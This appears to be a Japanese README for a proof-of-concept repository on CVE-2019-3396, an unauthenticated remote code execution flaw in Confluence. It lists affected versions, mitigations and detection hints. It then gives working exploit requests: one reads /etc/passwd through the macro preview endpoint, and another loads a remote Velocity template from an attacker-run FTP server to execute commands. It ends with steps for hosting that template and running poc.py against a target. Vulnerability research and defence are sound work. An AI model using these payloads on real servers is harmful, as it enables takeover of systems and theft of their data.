CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 CVE-2019-3396 とは?
- Atlassian の重大な Confluence バグです。
- タイプ: テンプレートインジェクション + パストラバーサル
- リスク: ログインなしのリモートコード実行 (RCE)
- ステータス: 実環境で悪用済み
🛑 影響を受けるバージョン
- 6.6.0 → 6.6.11 ❌ 脆弱
- 6.6.12 ✅ 修正済み
- 6.12.0 → 6.12.2 ❌ 脆弱
- 6.12.3 ✅ 修正済み
- 6.13.0 → 6.13.2 ❌ 脆弱
- 6.13.3 ✅ 修正済み
- 6.14.0 → 6.14.1 ❌ 脆弱
- 6.14.2 ✅ 修正済み
👉 詳細は必ず Atlassian の公式アドバイザリを確認してください。
💥 影響
- サーバーの完全乗っ取り
- データ窃取、ランサムウェア、暗号通貨マイナー
- 攻撃者は任意のコードを実行可能
🔐 緩和策
- ✅ 修正済みの Confluence バージョンにアップグレード(最善の対策)
- 🚫 すぐにパッチを適用できない場合は Widget Connector マクロを無効化
- 🔒 アクセスを制限(修正が完了するまで内部のみ)
👀 検出(安全なヒント)
- マクロ/preview エンドポイントへの不審なリクエストがないかログを監視
- 不審なプロセスや外部への通信を確認
- 脆弱性スキャナを使用してバージョンを確認
📂 ファイル読み取り
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
コマンド実行
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
自動化
- VPS に cmd.vm をアップロード
- ftp または https を使用してこの cmd.vm ファイルへのリンクを作成
pip install pyftpdlib
python -m pyftpdlib -p 8888
- poc.py ファイル内の pyftp の値を新しい値に更新 = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ ヒント — このリポジトリは教育、防御、啓発のみを目的としています。
🔗 参考リンク